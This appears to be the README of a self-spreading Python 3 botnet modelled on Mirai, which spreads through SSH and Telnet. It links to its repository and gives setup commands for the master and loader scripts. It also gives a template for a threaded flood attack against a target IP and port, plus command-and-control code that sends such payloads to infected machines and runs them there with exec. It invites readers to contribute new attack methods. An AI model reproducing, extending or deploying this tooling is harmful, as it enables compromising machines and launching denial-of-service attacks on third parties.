🐛 Self spreading Botnet based on Mirai C&C Arch, spreading through SSH and Telnet protocol. Modern script fullly written in python3.
Self spreading Botnet based on Mirai C&C Arch, spreading through SSH and Telnet protocol.
Modern script fullly written in python3.
Warning.
Requirements.
How to setup.
for the moment you can use that: https://github.com/Its-Vichy/Mirkat
chmod +x ./script/*.sh
./Install.sh
./RunMaster.sh
./RunMaster.sh
./Loader.sh
Custom payload.
If you whant to share your methods, just create pull requests <3
Zombie
(cnc.py / #2)import socket, threading, time
__THREAD_NUMBER__ = 500
def method_name(ip: str, port: str, timeout: str):
def flood(ip: str, port: int, timeout: int):
start_time = int(time.time())
while int(time.time()) - start_time < timeout:
# write method code here
# Exemple: https://github.com/Its-Vichy/HBot/blob/main/src/payload/http_flood.py
for _ in range(int(__THREAD_NUMBER__)):
threading.Thread(target= flood, args=(ip, int(port), int(timeout))).start()
method_name('!ip!', '!port!', '!time!')
def ddos_payload(self, ip: str, port: str, timeout: str, type: str):
if type == 'http':
payload = self.parse_method('./payload/http_flood.py', ip, port, timeout)
if type == 'your method name without space lmao':
payload = self.parse_method('./payload/your_method_file.py', ip, port, timeout)
self.send(f'run|{payload}')
# Just look for this line
# add: 'module_name': module_name
# Ex: 'random': random
threading.Thread(target= exec, args=(payload, {'threading': threading, 'socket': socket, 'time': time, 'module_name': module_name})).start()
How is working.
Support me.
Informations